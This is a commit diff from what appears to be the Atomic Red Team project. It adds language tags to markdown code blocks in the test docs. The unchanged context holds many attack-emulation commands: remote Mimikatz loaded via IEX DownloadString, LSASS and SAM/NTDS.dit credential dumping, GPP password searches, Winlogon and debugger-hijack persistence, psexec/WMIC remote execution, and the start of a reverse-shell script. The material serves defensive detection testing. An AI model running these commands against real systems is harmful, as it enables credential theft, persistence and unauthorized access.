security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Specify language for markdown code blocks (#882)

Browse Source 
* specify code block type in markdown

* specify code block type in markdown
This commit is contained in:
Carrie Roberts
2020-03-16 08:46:25 -06:00
committed by GitHub
parent 71f3fbbaeb
commit 6ec7d4bcf0
155 changed files with 2784 additions and 1720 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomic_red_team/atomic_doc_template.md.erb
+16 -5
View File
@@ -41,28 +41,39 @@ end.join(', ') %>
#### Attack Commands: Run with `<%= test['executor']['name'] %>`! <%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin) <%- end -%>
```
<%def get_language(executor)
language = executor
if executor == "command_prompt"
language = "cmd"
elsif executor == "manual"
language = ""
end
language
end%>
```<%= get_language(test['executor']['name']) %>
<%= test['executor']['command'].to_s.strip %>
```
<%- end -%>
<%- if test['executor']['cleanup_command'] != nil -%>
#### Cleanup Commands:
```
```<%= get_language(test['executor']['name']) %>
<%= test['executor']['cleanup_command'].to_s.strip %>
```
<%- end -%>
<% if test['dependencies'].to_a.count > 0 %>
#### Dependencies: Run with `<%- if test['dependency_executor_name'] != nil%><%= test['dependency_executor_name'] %><%- else -%><%= test['executor']['name'] %><%- end -%>`!
<% dependency_executor = test['executor']['name'] %>
#### Dependencies: Run with `<%- if test['dependency_executor_name'] != nil%><% dependency_executor = test['dependency_executor_name'] %><%= test['dependency_executor_name'] %><%- else -%><%= test['executor']['name'] %><%- end -%>`!
<% test['dependencies'].each do | dep | -%>
##### Description: <%= dep['description'].strip! %>
##### Check Prereq Commands:
```
```<%= get_language(dependency_executor) %>
<%= dep['prereq_command'].strip! %>
```
##### Get Prereq Commands:
```
```<%= get_language(dependency_executor) %>
<%= dep['get_prereq_command'].strip! %>
```
<% end -%>
atomics/T1002/T1002.md
+29 -16
View File
@@ -31,12 +31,14 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
#### Attack Commands: Run with `powershell`!
```
```powershell
dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
```
#### Cleanup Commands:
```
```powershell
Remove-Item -path #{output_file} -ErrorAction Ignore
```
@@ -64,24 +66,27 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
#### Attack Commands: Run with `command_prompt`!
```
```cmd
"#{rar_exe}" a -r #{output_file} #{input_path} *#{file_extension}
```
#### Cleanup Commands:
```
```cmd
del /f /q /s #{output_file} >nul 2>&1
```
#### Dependencies: Run with `command_prompt`!
##### Description: Rar tool must be installed at specified location (#{rar_exe})
##### Check Prereq Commands:
```
```cmd
if not exist "#{rar_exe}" (exit /b 1)
```
##### Get Prereq Commands:
```
```cmd
echo Downloading Winrar installer
bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer}
echo Follow the installer prompts to install Winrar
@@ -108,24 +113,27 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
#### Attack Commands: Run with `sh`!
```
```sh
zip #{output_file} #{input_files}
```
#### Cleanup Commands:
```
```sh
rm -f #{output_file}
```
#### Dependencies: Run with `sh`!
##### Description: Files to zip must exist (#{input_files})
##### Check Prereq Commands:
```
```sh
ls #{input_files}
```
##### Get Prereq Commands:
```
```sh
echo Please set input_files argument to include files that exist
```
@@ -149,12 +157,14 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
#### Attack Commands: Run with `sh`!
```
```sh
test -e #{input_file} && gzip -k #{input_file} || (echo '#{input_content}' >> #{input_file}; gzip -k #{input_file})
```
#### Cleanup Commands:
```
```sh
rm -f #{input_file}.gz
```
@@ -179,24 +189,27 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
#### Attack Commands: Run with `sh`!
```
```sh
tar -cvzf #{output_file} #{input_file_folder}
```
#### Cleanup Commands:
```
```sh
rm -f #{output_file}
```
#### Dependencies: Run with `sh`!
##### Description: Folder to zip must exist (#{input_file_folder})
##### Check Prereq Commands:
```
```sh
test -e #{input_file_folder}
```
##### Get Prereq Commands:
```
```sh
echo Please set input_file_folder argument to a folder that exists
```
atomics/T1003/T1003.md
+91 -54
View File
@@ -179,7 +179,9 @@ Dumps credentials from memory via Powershell by invoking a remote mimikatz scrip
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
```
@@ -206,20 +208,23 @@ Dump credentials from memory using Gsecdump
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
#{gsecdump_exe} -a
```
#### Dependencies: Run with `powershell`!
##### Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
$parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){
@@ -249,20 +254,23 @@ Dump credentials from memory using Windows Credential Editor from https://www.am
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
#{wce_exe} -o #{output_file}
```
#### Dependencies: Run with `powershell`!
##### Description: Windows Credential Editor must exist on disk at specified location (#{wce_exe})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{wce_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
$parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
@@ -287,14 +295,16 @@ via three registry keys. Then processed locally using https://github.com/Neohaps
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
```
#### Cleanup Commands:
```
```cmd
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
@@ -322,24 +332,27 @@ ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysin
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
#{procdump_exe} -accepteula -ma lsass.exe #{output_file}
```
#### Cleanup Commands:
```
```cmd
del "#{output_file}" >nul 2> nul
```
#### Dependencies: Run with `powershell`!
##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
@@ -395,20 +408,23 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
```
#### Dependencies: Run with `powershell`!
##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200308/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip"
Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
@@ -416,11 +432,11 @@ Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
```
##### Description: Lsass dump must exist at specified location (#{input_file})
##### Check Prereq Commands:
```
```powershell
cmd /c "if not exist #{input_file} (exit /b 1)"
```
##### Get Prereq Commands:
```
```powershell
Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)"
```
@@ -445,20 +461,23 @@ subsequent domain controllers without the need of network-based replication.
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
```
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```
```cmd
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
@@ -481,20 +500,23 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
vssadmin.exe create shadow /for=#{drive_letter}
```
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```
```cmd
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
@@ -522,46 +544,49 @@ This test must be executed on a Windows Domain Controller.
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
```
#### Cleanup Commands:
```
```cmd
del "#{extract_path}\ntds.dit" >nul 2> nul
del "#{extract_path}\VSC_SYSTEM_HIVE" >nul 2> nul
del "#{extract_path}\SYSTEM_HIVE" >nul 2> nul
```
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```
```cmd
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
##### Description: Volume shadow copy must exist
##### Check Prereq Commands:
```
```cmd
if not exist #{vsc_name} (exit /b 1)
```
##### Get Prereq Commands:
```
```cmd
echo Run "Invoke-AtomicTest T1003 -TestName 'Create Volume Shadow Copy with NTDS.dit'" to fulfuill this requirement
```
##### Description: Extract path must exist
##### Check Prereq Commands:
```
```cmd
if not exist #{extract_path} (exit /b 1)
```
##### Get Prereq Commands:
```
```cmd
mkdir #{extract_path}
```
@@ -579,20 +604,23 @@ Look for the encrypted cpassword value within Group Policy Preference files on t
#### Attack Commands: Run with `command_prompt`!
```
```cmd
findstr /S cpassword %logonserver%\sysvol\*.xml
```
#### Dependencies: Run with `powershell`!
##### Description: Computer must be domain joined
##### Check Prereq Commands:
```
```powershell
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
Write-Host Joining this computer to a domain must be done manually
```
@@ -616,31 +644,34 @@ Look for the encrypted cpassword value within Group Policy Preference files on t
#### Attack Commands: Run with `powershell`!
```
```powershell
. #{gpp_script_path}
Get-GPPPassword -Verbose
```
#### Dependencies: Run with `powershell`!
##### Description: Get-GPPPassword PowerShell Script must exist at #{gpp_script_path}
##### Check Prereq Commands:
```
```powershell
if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1 }
```
##### Get Prereq Commands:
```
```powershell
New-Item -ItemType Directory (Split-Path "#{gpp_script_path}") -Force | Out-Null
Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}"
```
##### Description: Computer must be domain joined
##### Check Prereq Commands:
```
```powershell
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
Write-Host Joining this computer to a domain must be done manually
```
@@ -659,38 +690,41 @@ Parses secrets hidden in the LSASS process with python. Similar to mimikatz's se
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
pypykatz live lsa
```
#### Dependencies: Run with `powershell`!
##### Description: Computer must have python 3 installed
##### Check Prereq Commands:
```
```powershell
if (python --version) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
echo "Python 3 must be installed manually"
```
##### Description: Computer must have pip installed
##### Check Prereq Commands:
```
```powershell
if (pip3 -V) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
echo "PIP must be installed manually"
```
##### Description: pypykatz must be installed and part of PATH
##### Check Prereq Commands:
```
```powershell
if (cmd /c pypykatz -h) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
pip3 install pypykatz
```
@@ -708,38 +742,41 @@ Parses registry hives to obtain stored credentials
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
pypykatz live registry
```
#### Dependencies: Run with `powershell`!
##### Description: Computer must have python 3 installed
##### Check Prereq Commands:
```
```powershell
if (python --version) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
echo "Python 3 must be installed manually"
```
##### Description: Computer must have pip installed
##### Check Prereq Commands:
```
```powershell
if (pip3 -V) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
echo "PIP must be installed manually"
```
##### Description: pypykatz must be installed and part of PATH
##### Check Prereq Commands:
```
```powershell
if (cmd /c pypykatz -h) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
pip3 install pypykatz
```
atomics/T1004/T1004.md
+12 -6
View File
@@ -34,12 +34,14 @@ PowerShell code to set Winlogon shell key to execute a binary at logon along wit
#### Attack Commands: Run with `powershell`!
```
```powershell
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
```
#### Cleanup Commands:
```
```powershell
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
```
@@ -63,12 +65,14 @@ PowerShell code to set Winlogon userinit key to execute a binary at logon along
#### Attack Commands: Run with `powershell`!
```
```powershell
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
```
#### Cleanup Commands:
```
```powershell
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
```
@@ -92,13 +96,15 @@ PowerShell code to set Winlogon Notify key to execute a notification package DLL
#### Attack Commands: Run with `powershell`!
```
```powershell
New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
```
#### Cleanup Commands:
```
```powershell
Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore
```
atomics/T1005/T1005.md
+3 -1
View File
@@ -25,7 +25,9 @@ This test uses `grep` to search a macOS Safari binaryCookies file for specified
#### Attack Commands: Run with `sh`!
```
```sh
cd ~/Library/Cookies
grep -q "#{search_string}" "Cookies.binarycookies"
```
atomics/T1007/T1007.md
+7 -3
View File
@@ -19,7 +19,9 @@ Identify system services
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
tasklist.exe
sc query
sc query state= all
@@ -46,12 +48,14 @@ Enumerates started system services using net.exe and writes them to a file. This
#### Attack Commands: Run with `command_prompt`!
```
```cmd
net.exe start >> #{output_file}
```
#### Cleanup Commands:
```
```cmd
del /f /q /s #{output_file} >nul 2>&1
```
atomics/T1009/T1009.md
+3 -1
View File
@@ -25,7 +25,9 @@ Uses dd to add a zero to the binary to change the hash
#### Attack Commands: Run with `sh`!
```
```sh
dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
```
atomics/T1010/T1010.md
+7 -4
View File
@@ -25,25 +25,28 @@ Compiles and executes C# code to list main window titles associated with each pr
#### Attack Commands: Run with `command_prompt`!
```
```cmd
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code}
#{output_file_name}
```
#### Cleanup Commands:
```
```cmd
del /f /q /s #{output_file_name} >nul 2>&1
```
#### Dependencies: Run with `powershell`!
##### Description: T1010.cs must exist on disk at specified location (#{input_source_code})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{input_source_code}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null
Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}"
```
atomics/T1012/T1012.md
+3 -1
View File
@@ -30,7 +30,9 @@ https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
atomics/T1014/T1014.md
+9 -3
View File
@@ -28,7 +28,9 @@ Loadable Kernel Module based Rootkit
#### Attack Commands: Run with `sh`!
```
```sh
sudo insmod #{rootkit_file}
```
@@ -53,7 +55,9 @@ Loadable Kernel Module based Rootkit
#### Attack Commands: Run with `sh`!
```
```sh
sudo modprobe #{rootkit_file}
```
@@ -85,7 +89,9 @@ It would be wise if you only run this in a test environment
#### Attack Commands: Run with `command_prompt`!
```
```cmd
puppetstrings #{driver_path}
```
atomics/T1015/T1015.md
+4 -2
View File
@@ -39,7 +39,9 @@ Attaches cmd.exe to a list of processes. Configure your own Input arguments to a
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
$input_table = "#{parent_list}".split(",")
$Name = "Debugger"
$Value = "#{attached_process}"
@@ -59,7 +61,7 @@ Foreach ($item in $input_table){
```
#### Cleanup Commands:
```
```powershell
$input_table = "#{parent_list}".split(",")
Foreach ($item in $input_table)
{
atomics/T1016/T1016.md
+19 -8
View File
@@ -27,7 +27,9 @@ Identify network configuration information
#### Attack Commands: Run with `command_prompt`!
```
```cmd
ipconfig /all
netsh interface show
arp -a
@@ -51,7 +53,9 @@ Enumerates Windows Firewall Rules using netsh.
#### Attack Commands: Run with `command_prompt`!
```
```cmd
netsh advfirewall firewall show rule name=all
```
@@ -71,7 +75,9 @@ Identify network configuration information
#### Attack Commands: Run with `sh`!
```
```sh
arp -a
netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c
ifconfig
@@ -93,7 +99,9 @@ Identify network configuration information as seen by Trickbot and described her
#### Attack Commands: Run with `command_prompt`!
```
```cmd
ipconfig /all
net config workstation
net view /all /domain
@@ -124,7 +132,9 @@ https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-wi
#### Attack Commands: Run with `powershell`!
```
```powershell
$ports = Get-content #{port_file}
$file = "#{output_file}"
$totalopen = 0
@@ -154,19 +164,20 @@ Write-Host $results
```
#### Cleanup Commands:
```
```powershell
Remove-Item -ErrorAction ignore "#{output_file}"
```
#### Dependencies: Run with `powershell`!
##### Description: Test requires #{port_file} to exist
##### Check Prereq Commands:
```
```powershell
if (Test-Path "#{port_file}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}"
```
atomics/T1018/T1018.md
+24 -8
View File
@@ -48,7 +48,9 @@ Identify remote systems with net.exe
#### Attack Commands: Run with `command_prompt`!
```
```cmd
net view /domain
net view
```
@@ -69,7 +71,9 @@ Identify remote systems with net.exe querying the Active Directory Domain Comput
#### Attack Commands: Run with `command_prompt`!
```
```cmd
net group "Domain Computers" /domain
```
@@ -94,7 +98,9 @@ Identify domain controllers for specified domain.
#### Attack Commands: Run with `command_prompt`!
```
```cmd
nltest.exe /dclist:#{target_domain}
```
@@ -114,7 +120,9 @@ Identify remote systems via ping sweep
#### Attack Commands: Run with `command_prompt`!
```
```cmd
for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
```
@@ -134,7 +142,9 @@ Identify remote systems via arp
#### Attack Commands: Run with `command_prompt`!
```
```cmd
arp -a
```
@@ -154,7 +164,9 @@ Identify remote systems via arp
#### Attack Commands: Run with `sh`!
```
```sh
arp -a | grep -v '^?'
```
@@ -174,7 +186,9 @@ Identify remote systems via ping sweep
#### Attack Commands: Run with `sh`!
```
```sh
for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
```
@@ -194,7 +208,9 @@ Powershell script that runs nslookup on cmd.exe against the local /24 network of
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
$localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]
$pieces = $localip.split(".")
$firstOctet = $pieces[0]
atomics/T1022/T1022.md
+16 -7
View File
@@ -25,7 +25,9 @@ Encrypt data for exiltration
#### Attack Commands: Run with `sh`!
```
```sh
mkdir /tmp/victim-files
cd /tmp/victim-files
touch a b c d e f g
@@ -38,7 +40,7 @@ ls -l
```
#### Cleanup Commands:
```
```sh
rm -Rf /tmp/victim-files
```
@@ -58,7 +60,9 @@ rar a -p"blue" hello.rar (VARIANT)
#### Attack Commands: Run with `command_prompt`!
```
```cmd
mkdir .\tmp\victim-files
cd .\tmp\victim-files
echo "This file will be encrypted" > .\encrypted_file.txt
@@ -90,7 +94,9 @@ wzzip sample.zip -s"blueblue" *.txt (VARIANT)
#### Attack Commands: Run with `command_prompt`!
```
```cmd
path=%path%;"C:\Program Files (x86)\winzip"
mkdir .\tmp\victim-files
cd .\tmp\victim-files
@@ -101,14 +107,15 @@ dir
#### Dependencies: Run with `powershell`!
##### Description: Winzip must be installed
##### Check Prereq Commands:
```
```powershell
cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)'
```
##### Get Prereq Commands:
```
```powershell
if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){
Write-Host Follow the installation prompts to continue
cmd /c "$env:Temp\winzip.exe"
@@ -129,7 +136,9 @@ Note: Requires 7zip installation
#### Attack Commands: Run with `command_prompt`!
```
```cmd
mkdir $PathToAtomicsFolder\T1022\victim-files
cd $PathToAtomicsFolder\T1022\victim-files
echo "This file will be encrypted" > .\encrypted_file.txt
atomics/T1023/T1023.md
+7 -3
View File
@@ -25,7 +25,9 @@ gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-Strin
#### Attack Commands: Run with `command_prompt`!
```
```cmd
echo [InternetShortcut] > test.url && echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path} && #{shortcut_file_path} >nul 2>&1
```
@@ -45,7 +47,9 @@ LNK file to launch CMD placed in startup folder
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
$Shell = New-Object -ComObject ("WScript.Shell")
$ShortCut = $Shell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1023.lnk")
$ShortCut.TargetPath="cmd.exe"
@@ -64,7 +68,7 @@ $ShortCut.Save()
```
#### Cleanup Commands:
```
```powershell
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1023.lnk" -ErrorAction Ignore
Remove-Item "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1023.lnk" -ErrorAction Ignore
```
atomics/T1027/T1027.md
+10 -4
View File
@@ -29,7 +29,9 @@ Creates a base64-encoded data file and decodes it into an executable shell scrip
#### Attack Commands: Run with `sh`!
```
```sh
sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat"
cat /tmp/encoded.dat | base64 -d > /tmp/art.sh
chmod +x /tmp/art.sh
@@ -57,7 +59,9 @@ Creates base64-encoded PowerShell code and executes it. This is used by numerous
#### Attack Commands: Run with `powershell`!
```
```powershell
$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
@@ -89,7 +93,9 @@ Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates i
#### Attack Commands: Run with `powershell`!
```
```powershell
$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
@@ -100,7 +106,7 @@ powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::From
```
#### Cleanup Commands:
```
```powershell
Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage}
```
atomics/T1028/T1028.md
+15 -5
View File
@@ -25,7 +25,9 @@ Powershell Enable WinRM
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
Enable-PSRemoting -Force
```
@@ -54,7 +56,9 @@ https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-applicatio
#### Attack Commands: Run with `command_prompt`!
```
```cmd
powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
```
@@ -81,7 +85,9 @@ Utilize WMIC to start remote process
#### Attack Commands: Run with `command_prompt`!
```
```cmd
wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
```
@@ -108,7 +114,9 @@ Utilize psexec to start remote process
#### Attack Commands: Run with `command_prompt`!
```
```cmd
psexec \\#{computer_name} -u #{user_name} -p #{password} -s cmd.exe
```
@@ -134,7 +142,9 @@ Execute Invoke-command on remote host
#### Attack Commands: Run with `powershell`!
```
```powershell
invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
```
atomics/T1030/T1030.md
+3 -1
View File
@@ -17,7 +17,9 @@ Take a file/directory, split it into 5Mb chunks
#### Attack Commands: Run with `sh`!
```
```sh
cd /tmp/
dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1
split -b 5000000 /tmp/victim-whole-file
atomics/T1031/T1031.md
+4 -2
View File
@@ -22,13 +22,15 @@ and will then revert the binPath change, restoring Fax to its original state.
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1031 Test'\""
sc start Fax
```
#### Cleanup Commands:
```
```cmd
sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe"
```
atomics/T1032/T1032.md
+3 -1
View File
@@ -26,7 +26,9 @@ https://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client-
#### Attack Commands: Run with `powershell`!
```
```powershell
$server_ip = #{server_ip}
$server_port = #{server_port}
$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', #{server_port})
atomics/T1033/T1033.md
+6 -2
View File
@@ -34,7 +34,9 @@ Identify System owner or users on an endpoint
#### Attack Commands: Run with `command_prompt`!
```
```cmd
cmd.exe /C whoami
wmic useraccount get /ALL
quser /SERVER:"#{computer_name}"
@@ -61,7 +63,9 @@ Identify System owner or users on an endpoint
#### Attack Commands: Run with `sh`!
```
```sh
users
w
who
atomics/T1035/T1035.md
+9 -4
View File
@@ -25,7 +25,9 @@ Creates a service specifying an aribrary command and executes it. When executing
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
sc.exe create #{service_name} binPath= #{executable_command}
sc.exe start #{service_name}
sc.exe delete #{service_name}
@@ -54,20 +56,23 @@ Will run a command on a remote host
#### Attack Commands: Run with `powershell`!
```
```powershell
#{psexec_exe} \\#{remote_host} "C:\Windows\System32\calc.exe"
```
#### Dependencies: Run with `powershell`!
##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
##### Check Prereq Commands:
```
```powershell
if (Test-Path "#{psexec_exe}"") { exit 0} else { exit 1}
```
##### Get Prereq Commands:
```
```powershell
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
New-Item -ItemType Directory ("#{psexec_exe}") -Force | Out-Null
atomics/T1036/T1036.md
+34 -17
View File
@@ -47,13 +47,15 @@ Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsas
#### Attack Commands: Run with `command_prompt`!
```
```cmd
